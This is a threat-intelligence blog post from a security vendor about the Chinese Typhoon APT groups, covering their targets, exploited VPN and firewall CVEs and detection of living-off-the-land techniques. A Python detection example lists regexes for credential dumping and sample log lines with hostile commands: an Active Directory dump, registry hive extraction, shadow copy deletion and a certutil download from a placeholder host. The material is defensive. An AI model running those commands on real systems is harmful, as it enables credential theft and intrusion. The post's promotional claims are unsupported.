
Chinese APT Typhoon Family: 20 IOCs for Volt, Salt, Flax, and Brass Typhoon

  • Writer: Patrick Duggan
  • Nov 30, 2025
  • 3 min read

Updated: Apr 25

TL;DR: We published an OTX pulse with 20 IOCs covering the Typhoon family of Chinese state-sponsored APTs. Volt Typhoon pre-positions in critical infrastructure. Salt Typhoon intercepts telecom traffic. Taiwan faces 2.4 million cyberattacks daily. Free. No paywall.




The Typhoon Threat


Microsoft's naming convention tells the story: Weather + Country = APT. The Typhoon family represents Chinese state-sponsored groups, and they're among the most sophisticated actors operating today.


The Four Typhoons:



• Volt Typhoon: Critical infrastructure pre-positioning (utilities, communications, transportation)

• Salt Typhoon: Telecom interception (compromised T-Mobile, AT&T, Verizon networks)

• Flax Typhoon: IoT botnet operations (compromised SOHO routers)

• Brass Typhoon: Southeast Asia espionage focus




Taiwan: Ground Zero


Taiwan faces an unprecedented cyber assault:



• 2.4 million cyberattacks daily on government networks

• 150% surge in 2024 compared to 2023

• Critical infrastructure targeting: Power grid, telecommunications, transportation

• Pre-positioning doctrine: Compromise now, activate during crisis


The Taiwan situation isn't just about data theft. It's about pre-positioning access for potential kinetic conflict. Volt Typhoon specifically targets systems that would be critical during military operations.




Salt Typhoon: The Telecom Nightmare


Salt Typhoon's telecom campaign is one of the most significant cyber espionage operations discovered:



• T-Mobile network infrastructure

• AT&T communications systems

• Verizon network components

• Lumen Technologies



• Call detail records (who called whom, when, for how long)

• Text message metadata

• Potentially voice communications

• Lawful intercept systems (wiretap infrastructure)


Why it matters: Accessing lawful intercept systems means they could see who the US government was surveilling. They know which targets were under investigation.




The Living-off-the-Land Doctrine


Volt Typhoon pioneered "living-off-the-land" (LOTL) techniques:



• `ntdsutil.exe` - Active Directory dump

• `wmic.exe` - Shadow copy deletion

• `netsh.exe` - Firewall manipulation

• `reg.exe` - Registry credential harvesting

• `certutil.exe` - File downloads

• `procdump.exe` - LSASS credential dump



• No malware to detect

• No signatures to match

• Native Windows tools

• Blends with normal admin activity


This is why we included YARA patterns in the pulse - detecting the command patterns rather than malware signatures.




The Pulse


Chinese APT Typhoon Family - Volt/Salt/Flax/Brass (Taiwan/Singapore/ASEAN) - DugganUSA


20 IOCs | Subscribe



• 8 C2 IP addresses (confirmed infrastructure)

• 4 CVEs (initial access vectors: Palo Alto, Ivanti, FortiGate)

• 8 YARA patterns (LOTL command detection)

• MITRE ATT&CK mapping (T1190, T1133, T1078, T1003, T1057, T1040)


Microsoft pulls this feed daily. AT&T pulls this feed daily. Starlink pulls this feed daily. Get the DugganUSA STIX feed — $9/mo →




CVE Arsenal


The Typhoon family exploits edge devices - VPNs, firewalls, and remote access solutions:


CVE-2024-3400 (Palo Alto GlobalProtect) - CVSS: 10.0 - Status: Actively exploited - Volt Typhoon: Primary initial access


CVE-2023-46805 + CVE-2024-21887 (Ivanti Connect Secure) - CVSS: 8.2 + 9.1 - Status: Chained exploitation - All Typhoon variants observed


CVE-2023-27997 (FortiGate SSL-VPN) - CVSS: 9.8 - Status: Actively exploited - Volt Typhoon vector


The pattern: Edge devices are the new perimeter. Compromise the VPN concentrator, and you're inside the network.




Regional Impact


Taiwan:

• Presidential Office targeted

• Ministry of National Defense probed

• Critical infrastructure pre-positioned

• Academia targeted for tech secrets


Singapore:

• Government networks targeted

• Financial sector reconnaissance

• Regional communications hub value


Philippines:

• South China Sea territorial disputes

• Military intelligence targeting

• US military base adjacency


ASEAN broadly (Thailand, Indonesia, Malaysia):

• Diplomatic communications

• Economic intelligence




Detection Strategies


Network-level:

1. Monitor for unusual outbound traffic to edge device C2s

2. Watch for LOTL tool execution patterns

3. Detect unusual Active Directory queries

4. Flag credential harvesting command sequences


Endpoint-level:

1. Alert on ntdsutil.exe execution

2. Monitor procdump targeting lsass.exe

3. Detect shadow copy deletion

4. Track registry SAM/SYSTEM extraction


The challenge: These look like admin activities. Context is everything.
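As an added illustration of the endpoint-level checks above (example code written for this page, not the pulse's YARA rules or any DugganUSA tooling), the following Python scores constructed Windows process-creation records against the LOTL command patterns listed earlier and flags a host where several credential-harvesting steps land inside one time window. The pipe-separated log format, host names and regexes are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Command-line patterns for LOTL tools named in the post; these regexes are this
# example's own approximations, not the pulse's YARA rules.
LOTL_PATTERNS = {
    "ntdsutil_ad_dump":   re.compile(r"\bntdsutil\b.*\b(ntds|ifm)\b"),
    "procdump_lsass":     re.compile(r"\bprocdump(64)?\b.*\blsass\b"),
    "shadow_copy_delete": re.compile(r"\bwmic\b.*\bshadowcopy\b.*\bdelete\b|\bvssadmin\b.*\bdelete\b.*\bshadows\b"),
    "reg_hive_save":      re.compile(r"\breg\b\s+save\b.*\bhklm\\(sam|system|security)\b"),
    "certutil_download":  re.compile(r"\bcertutil\b.*\burlcache\b"),
}
# Hits that, seen together on one host, form a credential-harvesting sequence.
CRED_HARVEST = {"ntdsutil_ad_dump", "procdump_lsass", "reg_hive_save"}
WINDOW = timedelta(minutes=15)

def parse(line):
    """Parse a constructed 'ts|host=..|user=..|cmd=..' process-creation record."""
    ts, *kv = line.strip().split("|")
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), **dict(p.split("=", 1) for p in kv)}

def classify(cmd):
    """Return the names of every LOTL pattern a command line matches."""
    c = cmd.lower().replace(".exe", "")  # normalise 'ntdsutil.exe' vs 'ntdsutil'
    return [name for name, rx in LOTL_PATTERNS.items() if rx.search(c)]

def analyze(lines):
    """Return (per-event hits, hosts with >=2 distinct harvesting steps inside WINDOW)."""
    hits, by_host = [], defaultdict(list)
    for rec in map(parse, lines):
        for name in classify(rec["cmd"]):
            hits.append((rec["host"], rec["user"], name))
            if name in CRED_HARVEST:
                by_host[rec["host"]].append((rec["ts"], name))
    sequences = {}
    for host, events in by_host.items():
        events.sort()
        for i, (t0, _) in enumerate(events):  # sliding window starting at each event
            names = {n for t, n in events[i:] if t - t0 <= WINDOW}
            if len(names) >= 2 and len(names) > len(sequences.get(host, [])):
                sequences[host] = sorted(names)
    return hits, sequences

SAMPLE_LOG = [  # constructed records, not real telemetry
    "2025-11-30T02:14:07Z|host=DC01|user=CORP\\svc_backup|cmd=ntdsutil.exe \"ac i ntds\" ifm \"create full C:\\temp\\x\" q q",
    "2025-11-30T02:16:40Z|host=DC01|user=CORP\\svc_backup|cmd=reg.exe save hklm\\system C:\\temp\\sys.hiv",
    "2025-11-30T02:20:11Z|host=WS07|user=CORP\\jdoe|cmd=certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
    "2025-11-30T03:01:00Z|host=WS07|user=CORP\\jdoe|cmd=wmic.exe shadowcopy delete",
    "2025-11-30T09:30:00Z|host=FS02|user=CORP\\admin|cmd=reg.exe query hklm\\software",  # benign admin query
]
```

The single-event hits are the noisy "looks like admin activity" layer; the sequence check on DC01 is the context that turns two plausible backup commands into an alert worth paging on.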




The Geopolitical Context


These aren't criminal operations. They're military operations conducted in peacetime.


Pre-positioning doctrine: Chinese military doctrine includes cyber pre-positioning - establishing access to critical infrastructure that can be activated during conflict.



• Ability to disrupt US military logistics in Pacific

• Intelligence on Taiwan defense planning

• Economic intelligence from ASEAN

• Telecom access for ongoing surveillance


What this means: The compromise isn't the objective. The access is the objective.




Resources



• [DugganUSA OTX Profile](https://otx.alienvault.com/user/pduggusa) - All pulses

• [STIX Feed](https://analytics.dugganusa.com/api/v1/stix-feed) - Machine-readable

• [CISA Volt Typhoon Advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a)

• [Microsoft Volt Typhoon Analysis](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/)




*Patrick Duggan is founder of DugganUSA, a Minnesota-based security company. He publishes Typhoon IOCs because (a) Taiwan's 24 million people deserve threat intel too, (b) what hits Taiwan today hits the US tomorrow, and (c) living-off-the-land is genuinely clever tradecraft that deserves documentation.*


*Questions? [email protected]*



The cheapest, fastest, most accurate threat feed on the internet.

275+ enterprises pulling daily. 1M+ IOCs. 17.4M indexed documents. We beat Zscaler by 43 days on NrodeCodeRAT. Starter tier $9/mo — less than any competitor’s sales demo.
